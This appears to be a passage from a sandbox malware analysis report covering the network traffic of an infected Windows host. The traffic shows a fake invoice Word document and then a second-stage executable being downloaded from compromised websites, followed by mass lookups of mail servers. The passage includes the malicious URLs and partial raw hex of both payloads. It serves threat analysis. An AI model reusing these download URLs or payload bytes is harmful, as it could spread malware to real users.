Okt 17, 2017 21:54:37.343180895 MESZ192.168.1.168.8.8.80x8ad5Standard query (0)smtp.ok.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.522598982 MESZ192.168.1.168.8.8.80x5292Standard query (0)star.gd-net.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.754550934 MESZ192.168.1.168.8.8.80xfc94Standard query (0)friends.zgoda.netA (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.860558987 MESZ192.168.1.168.8.8.80x3b7dStandard query (0)mail.obx.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.932879925 MESZ192.168.1.168.8.8.80x9b02Standard query (0)mail.apanet.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.081823111 MESZ192.168.1.168.8.8.80x567bStandard query (0)patricia.xoc.tele2net.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.297322989 MESZ192.168.1.168.8.8.80x4596Standard query (0)mailc40.carrierzone.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:39.107225895 MESZ192.168.1.168.8.8.80xdbb0Standard query (0)lb-proxy-16.websupport.skA (IP address)IN (0x0001)
Okt 17, 2017 21:54:39.618007898 MESZ192.168.1.168.8.8.80x8a7dStandard query (0)mx01.inxenio.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:39.620553017 MESZ192.168.1.168.8.8.80xe540Standard query (0)dd29902.kasserver.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:39.666569948 MESZ192.168.1.168.8.8.80x968fStandard query (0)poczta.interia.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.071121931 MESZ192.168.1.168.8.8.80x4f51Standard query (0)mail.o2mail.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.322349072 MESZ192.168.1.168.8.8.80x680Standard query (0)mail.o2mail.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.512640953 MESZ192.168.1.168.8.8.80x86e8Standard query (0)mail.idnet.euA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.515192986 MESZ192.168.1.168.8.8.80x13baStandard query (0)mail5.hostmaster.skA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.559281111 MESZ192.168.1.168.8.8.80xc2a8Standard query (0)host4.ssl-gesichert.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.693851948 MESZ192.168.1.168.8.8.80xc67Standard query (0)mx1.kabsi.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.697457075 MESZ192.168.1.168.8.8.80x7547Standard query (0)smtp.majordomo.ruA (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.108417988 MESZ192.168.1.168.8.8.80x2a24Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.357425928 MESZ192.168.1.168.8.8.80x90a7Standard query (0)mail.arcor.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.457832098 MESZ192.168.1.168.8.8.80x778fStandard query (0)smtp.blys.euA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.521584988 MESZ192.168.1.168.8.8.80xe459Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.682028055 MESZ192.168.1.168.8.8.80xbe03Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.775572062 MESZ192.168.1.168.8.8.80xf193Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.908085108 MESZ192.168.1.168.8.8.80x1018Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.913744926 MESZ192.168.1.168.8.8.80x4eedStandard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.944986105 MESZ192.168.1.168.8.8.80xcafcStandard query (0)smtp.world4you.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.949193001 MESZ192.168.1.168.8.8.80x78cStandard query (0)mail.arcor.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.093003988 MESZ192.168.1.168.8.8.80x36d8Standard query (0)smtp.liwest.atA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Okt 17, 2017 21:53:38.456110001 MESZ8.8.8.8192.168.1.160x78c2No error (0)austinfilmschool.org184.175.109.73A (IP address)IN (0x0001)
Okt 17, 2017 21:53:58.197060108 MESZ8.8.8.8192.168.1.160x323bNo error (0)zlc-aa.org209.59.172.114A (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.931807041 MESZ8.8.8.8192.168.1.160x2accNo error (0)e24.ehosts.com108.167.137.14A (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.967278957 MESZ8.8.8.8192.168.1.160x32d1No error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.976207972 MESZ8.8.8.8192.168.1.160xd275No error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.003207922 MESZ8.8.8.8192.168.1.160x3cecNo error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.012145996 MESZ8.8.8.8192.168.1.160x1af6No error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.025614977 MESZ8.8.8.8192.168.1.160x7ee6No error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.178567886 MESZ8.8.8.8192.168.1.160x3a20No error (0)smtpout.secureserver.net173.201.192.101A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.193166018 MESZ8.8.8.8192.168.1.160xb403No error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307306051 MESZ8.8.8.8192.168.1.160x90ecNo error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307351112 MESZ8.8.8.8192.168.1.160x9f18No error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307377100 MESZ8.8.8.8192.168.1.160x272cNo error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307403088 MESZ8.8.8.8192.168.1.160xbe50No error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307426929 MESZ8.8.8.8192.168.1.160x461aNo error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307451963 MESZ8.8.8.8192.168.1.160x826eNo error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.307482004 MESZ8.8.8.8192.168.1.160x1546No error (0)smtp.live.com40.101.48.82A (IP address)IN (0x0001)
Okt 17, 2017 21:54:31.423110008 MESZ8.8.8.8192.168.1.160x1ac8No error (0)pop.loomes.net217.119.50.35A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.108905077 MESZ8.8.8.8192.168.1.160xcec9No error (0)smtp.outlook.com40.101.43.178A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.202631950 MESZ8.8.8.8192.168.1.160x7944No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.209966898 MESZ8.8.8.8192.168.1.160xdd2No error (0)ssl0.ovh.net213.186.33.20A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.258923054 MESZ8.8.8.8192.168.1.160xbffaNo error (0)mail.active24.pl195.78.67.24A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.277282953 MESZ8.8.8.8192.168.1.160x5ffNo error (0)smtp.poczta.onet.pl213.180.147.145A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.304066896 MESZ8.8.8.8192.168.1.160x17a4No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.884783030 MESZ8.8.8.8192.168.1.160x4ae2No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.292162895 MESZ8.8.8.8192.168.1.160xc3ecNo error (0)virtual1.mx.freenet.de195.4.92.211A (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.587651968 MESZ8.8.8.8192.168.1.160xe5c4No error (0)virtual0.mx.freenet.de195.4.92.210A (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.866101027 MESZ8.8.8.8192.168.1.160x75f9No error (0)smtp.t-2.net84.255.208.30A (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.052781105 MESZ8.8.8.8192.168.1.160xc2fbNo error (0)service3.xmobile-services.at193.110.129.149A (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.178107977 MESZ8.8.8.8192.168.1.160x8a78No error (0)dug-service.de81.169.145.164A (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.342417002 MESZ8.8.8.8192.168.1.160x6f44No error (0)mail.mediaserve.de82.207.178.23A (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.615745068 MESZ8.8.8.8192.168.1.160xd674No error (0)zobelei.de85.13.152.217A (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.887656927 MESZ8.8.8.8192.168.1.160xed75No error (0)mail.zered.at85.124.51.105A (IP address)IN (0x0001)
Okt 17, 2017 21:54:36.102555990 MESZ8.8.8.8192.168.1.160x4bb7No error (0)send.one.com91.198.169.21A (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.280257940 MESZ8.8.8.8192.168.1.160x7d6eNo error (0)smtp.tele2.at213.90.36.113A (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.607722998 MESZ8.8.8.8192.168.1.160xf6a9No error (0)w00b4087.kasserver.com85.13.134.71A (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.789937973 MESZ8.8.8.8192.168.1.160x43a4No error (0)ns0.ovh.net213.186.33.155A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.001272917 MESZ8.8.8.8192.168.1.160x8ad5No error (0)smtp.ok.de88.198.199.114A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.097083092 MESZ8.8.8.8192.168.1.160x5292No error (0)star.gd-net.pl195.250.38.66A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.188313007 MESZ8.8.8.8192.168.1.160xfc94No error (0)friends.zgoda.net193.17.223.40A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.316471100 MESZ8.8.8.8192.168.1.160x3b7dNo error (0)mail.obx.de91.106.125.115A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.476599932 MESZ8.8.8.8192.168.1.160x567bNo error (0)patricia.xoc.tele2net.at213.90.36.9A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.607454062 MESZ8.8.8.8192.168.1.160x9b02No error (0)mail.apanet.at194.232.25.64A (IP address)IN (0x0001)
Okt 17, 2017 21:54:38.924998999 MESZ8.8.8.8192.168.1.160x4596No error (0)mailc40.carrierzone.com64.29.151.235A (IP address)IN (0x0001)
Okt 17, 2017 21:54:39.422228098 MESZ8.8.8.8192.168.1.160xdbb0No error (0)lb-proxy-16.websupport.sk37.9.169.18A (IP address)IN (0x0001)
Okt 17, 2017 21:54:39.933840036 MESZ8.8.8.8192.168.1.160x8a7dNo error (0)mx01.inxenio.com94.23.80.86A (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.052686930 MESZ8.8.8.8192.168.1.160xe540No error (0)dd29902.kasserver.com85.13.128.99A (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.145055056 MESZ8.8.8.8192.168.1.160x968fNo error (0)poczta.interia.pl217.74.64.236A (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.430604935 MESZ8.8.8.8192.168.1.160x4f51No error (0)mail.o2mail.de91.136.8.189A (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.555732965 MESZ8.8.8.8192.168.1.160x680No error (0)mail.o2mail.de91.136.8.189A (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.849541903 MESZ8.8.8.8192.168.1.160x86e8No error (0)mail.idnet.eu217.76.224.5A (IP address)IN (0x0001)
Okt 17, 2017 21:54:40.999649048 MESZ8.8.8.8192.168.1.160xc2a8No error (0)host4.ssl-gesichert.at213.145.228.17A (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.099785089 MESZ8.8.8.8192.168.1.160x13baNo error (0)mail5.hostmaster.sk46.229.230.234A (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.189830065 MESZ8.8.8.8192.168.1.160x7547No error (0)smtp.majordomo.ru78.108.80.162A (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.199172020 MESZ8.8.8.8192.168.1.160xc67No error (0)mx1.kabsi.at195.202.128.4A (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.338852882 MESZ8.8.8.8192.168.1.160x2a24No error (0)smtp.gmail.com74.125.205.108A (IP address)IN (0x0001)
Okt 17, 2017 21:54:41.710196018 MESZ8.8.8.8192.168.1.160x90a7No error (0)mail.arcor.de153.92.65.114A (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.011389971 MESZ8.8.8.8192.168.1.160x778fNo error (0)smtp.blys.eu94.152.8.23A (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.783135891 MESZ8.8.8.8192.168.1.160xe459No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:42.918979883 MESZ8.8.8.8192.168.1.160xbe03No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.051275969 MESZ8.8.8.8192.168.1.160xf193No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.195643902 MESZ8.8.8.8192.168.1.160x1018No error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.387650013 MESZ8.8.8.8192.168.1.160x4eedNo error (0)smtp.wp.pl212.77.101.1A (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.421097040 MESZ8.8.8.8192.168.1.160x78cNo error (0)mail.arcor.de153.92.65.114A (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.484106064 MESZ8.8.8.8192.168.1.160xcafcNo error (0)smtp.world4you.com81.19.149.200A (IP address)IN (0x0001)
Okt 17, 2017 21:54:43.597601891 MESZ8.8.8.8192.168.1.160x36d8No error (0)smtp.liwest.at212.33.55.20A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • austinfilmschool.org
  • zlc-aa.org
  • 5.196.73.150:443
  • 93.180.157.92:443

HTTP Packets

TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Okt 17, 2017 21:53:38.465022087 MESZ4919080192.168.1.16184.175.109.73HEAD /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Accept: */*
Host: austinfilmschool.org
Connection: Keep-Alive
0
Okt 17, 2017 21:53:39.484179974 MESZ8049190184.175.109.73192.168.1.16HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Length: 0
Content-Type: application/msword
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Client- 9650, Oct 2017 Invoice.doc"
Content-Transfer-Encoding: binary
X-Powered-By: ASP.NET
Date: Tue, 17 Oct 2017 19:53:39 GMT
Connection: keep-alive
1
Okt 17, 2017 21:53:39.492096901 MESZ4919080192.168.1.16184.175.109.73GET /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Accept: */*
Host: austinfilmschool.org
Connection: Keep-Alive
1
Okt 17, 2017 21:53:39.912420988 MESZ8049190184.175.109.73192.168.1.16HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Type: application/msword
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Client- 9650, Oct 2017 Invoice.doc"
Content-Transfer-Encoding: binary
X-Powered-By: ASP.NET
Date: Tue, 17 Oct 2017 19:53:39 GMT
Connection: keep-alive
Content-Length: 87040
Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 50 00 00 00 00 00 00 00 00 10 00 00 53 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 4f 00 00 00 7c 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 00 00 00 00 00 32 07 00 00 00 00 00 00 32 07 00 00 ae 14 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 ae 14 00 00 14 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 c2 14 00 00 00 00 00 00 c2 14 00 00 00 00 00 00 c2 14 00 00 00 00 00 00 c2 14 00 00 0c 00 00 00 ce 14 00 00 0c 00 00 00 c2 14 00 00 00 00 00 00 37 17 00 00 30 01 00 00 da 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 1d 16 00 00 9b 00 00 00 b8 16 00 00 00 00 00 00 b8 16 00 00 00 00 00 00 b8 16 00 00 00 00 00 00 b8 16 00 00 00 00 00 00 b8 16 00 00 00 00 00 00 b8 16 00 00 24 00 00 00 67 18 00 00 b6 02 00 00 1d 1b 00 00 2a 00 00 00 dc 16 00 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 b5 15 00 00 00 00 00 00 dc 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 14 00 00 db 00 00 00 f1 16 00
Data Ascii: >PSO|Ubjbjnn.aa2270$g*
2
Okt 17, 2017 21:53:39.912487030 MESZ8049190184.175.109.73192.168.1.16Data Raw: 00 16 00 00 00 d9 15 00 00 00 00 00 00 d9 15 00 00 00 00 00 00 d9 15 00 00 00 00 00 00 b5 15 00 00 0a 00 00 00 ae 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 ae 14 00 00 00 00 00 00 da 14 00 00 00 00 00 00 1d 16 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
4
Okt 17, 2017 21:53:39.912520885 MESZ8049190184.175.109.73192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
4
Okt 17, 2017 21:53:40.040741920 MESZ8049190184.175.109.73192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii:
6
Okt 17, 2017 21:53:40.040785074 MESZ8049190184.175.109.73192.168.1.16Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 50 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 63 24 70 17 e8 03 e8 03 00
Data Ascii: APDdc$pJC&AofficeRO\#Ixun,OD+F
7
Okt 17, 2017 21:53:40.047890902 MESZ8049190184.175.109.73192.168.1.16Data Raw: 7d a7 bb 41 53 32 df 49 78 fa c5 d1 d0 63 ed 3f c9 df 0b 3f 3e ea 9f c7 f2 39 dc 5d 69 ae 71 2d 6b 59 a0 4f 41 ee 85 5e a9 5f da ae 41 5f 9b 97 c5 90 33 9b 5b d6 ce b6 a9 39 1d 43 27 7c d2 91 a7 5b d3 fa 16 19 c3 19 f3 ce e2 63 7a 6f 72 9c 71 9b
Data Ascii: }AS2Ixc??>9]iq-kYOA^_A_3[9C'|[czorq~=?^e>d(bu}E=-#eygy,lGo4{{r?56Q1@_u>;;s;]Y-kHoSs?dg
8
Okt 17, 2017 21:53:40.047933102 MESZ8049190184.175.109.73192.168.1.16Data Raw: f9 b1 81 a7 f3 09 1f 6a bc 77 6e 23 f4 65 93 ee ec 56 f0 f5 6b 6b d6 77 af ed 0d 8d 4b 71 5d a9 15 98 5d cd 14 8d 0e 69 f5 05 69 73 9c 67 8a c1 bf c2 9a 53 24 ff 00 f9 71 f5 23 ef f4 5e 1c 45 79 9c 2b c2 bc 95 49 0e 6b 44 30 6c ef 47 c8 9f b8 2a
Data Ascii: jwn#eVkkwKq]]iisgS$q#^Ey+IkD0lG*9(Nc*9G{5?{a3l5r-k:#W*7+2Y[$O^C>JGZ}z*?Vp<<o.,\qy8/[Wb|T8 nBlt
10
Okt 17, 2017 21:53:40.047943115 MESZ8049190184.175.109.73192.168.1.16Data Raw: 00 36 2f 8c 07 0b f1 0c 3c 59 5b 27 7e 21 af 10 be 57 f8 8d 24 f4 23 b0 5d 3e 49 63 8d 85 cf 7b 43 40 d9 24 ac 0a 39 ba 19 0b d3 54 ab 3b 65 92 16 87 3f 97 a8 1b f9 ad f3 c4 a7 74 4c da 7f ba 0f de 79 e6 96 8a 63 ac 44 c6 a6 62 3d 8d a8 52 a0 29
Data Ascii: 6/<Y['~!W$#]>Ic{C@$9T;e?tLycDb=R)S" "(AWy?_+?E^GEN^sw?#Pb<.$|=v$^.)#sk*n7S{s\4ucSv+-3N7b\l1{-l-8
11
Okt 17, 2017 21:53:40.173105001 MESZ8049190184.175.109.73192.168.1.16Data Raw: 9d ac ae 2e 3e e6 1f ff 00 dc a1 ff 00 75 ef 6f 05 3e 4b 07 ec 57 ef 39 f6 79 c4 8d b0 c6 06 f2 38 1d 8d 0f 92 c2 93 86 f2 77 a4 a7 26 4b 2c 24 75 59 9b 2b 1b 1c 3c ad 3a f5 eb d4 94 1e 12 e3 61 ca 71 ed c8 ed 82 fa ec a3 11 31 13 ee bc f3 3b b8
Data Ascii: .>uo>KW9y8w&K,$uY+<:aq1;9l2PW0'_faxd>rwEOfr9]rwAT>H9:~v%ccGie\t$uEo!y,GZ ~9]9jGyso
12
Okt 17, 2017 21:53:40.173129082 MESZ8049190184.175.109.73192.168.1.16Data Raw: cc e9 eb 3c d5 91 c7 67 94 6d a4 fd ca eb a4 d2 d7 93 0d 32 46 af 1b 6f c1 c9 cb c7 b7 76 2b 6a 5c b3 fe 8b b2 1b d3 72 91 72 ff 00 2b 96 db 15 f4 67 46 b3 c4 97 e7 7d a7 03 be 4d 72 b7 ff 00 92 af ba 4d 2d 15 e0 e1 ac ef 49 99 3a c7 32 f5 ed 9b
Data Ascii: <gm2Fov+j\rr+gF}MrM-I:2mCc&4h5@/)E+J`x,asd/5V:iJ,iV3g'r)$,._[uNy1hI*T,T}{x@%c_^SiW92Z
14
Okt 17, 2017 21:53:40.173142910 MESZ8049190184.175.109.73192.168.1.16Data Raw: 4f 29 07 47 47 5e 45 54 73 f7 ef 59 e1 fc 2d ca 77 45 07 d9 b3 58 c8 ee 5e 61 a7 91 d3 a9 1d 3a fe 2b 45 8c c8 e4 b0 f6 2c d8 8a c3 26 ab 63 3b 62 b3 ab 78 7d 5c 48 73 b9 83 b7 df 6d ed db 45 07 4c 50 5c 1b ad 9e fd 95 33 83 73 79 bc bb e3 9e f3
Data Ascii: O)GG^ETsY-wEX^a:+E,&c;bx}\HsmELP\3syv* 1v'cvB8g[t\+V\yM0ud9]|wYU!fAH.[Mf8={5mTv@0>}W(c
14
Okt 17, 2017 21:53:58.257273912 MESZ4919180192.168.1.16209.59.172.114GET /nwbBJRnf/ HTTP/1.1
Host: zlc-aa.org
Connection: Keep-Alive
92
Okt 17, 2017 21:53:59.048201084 MESZ8049191209.59.172.114192.168.1.16HTTP/1.1 200 OK
Date: Tue, 17 Oct 2017 19:53:59 GMT
Server: Apache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="oONrrsveB.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream
Data Raw: 31 38 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 22 00 00 00 00 00 00 00 50 90 14 60 14 f1 7a 33 14 f1 7a 33 14 f1 7a 33 19 a3 9b 33 37 f1 7a 00 19 a3 a5 33 1b f1 7a 33 19 a3 9a 33 6b f1 7a 33 1d 89 e9 33 19 f1 7a 33 14 f1 7b 33 67 f1 7a 33 69 88 9b 33 16 f1 7a 33 69 88 9a 33 16 f1 7a 33 19 a3 a1 33 15 f1 7a 33 14 f1 ed 33 15 f1 7a 33 69 88 a4 33 15 f1 7a 33 52 69 63 68 14 f1 7a 33 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a8 d6 e6 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 40 00 00 00 30 01 00 00 00 00 00 60 19 00 00 00 10 00 00 00 50 00 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 10 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 62 00 00 f0 00 00 00 00 60 01 00 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 01 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8e 30 00 00 00 10 00 00 00 40 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 